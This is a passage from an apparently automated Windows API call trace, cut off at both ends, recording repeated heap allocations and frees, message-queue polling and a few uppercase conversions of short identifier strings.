Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0199.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0199.297] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0199.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0199.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0199.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0199.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa98 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0199.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0199.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0199.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0199.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0199.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0199.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0199.300] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0199.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0199.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0199.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0199.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.301] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0199.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.302] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0199.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0199.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0199.303] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0199.304] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0199.304] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0199.304] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0199.304] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0199.304] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0199.305] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0199.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0199.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0199.305] PeekMessageW 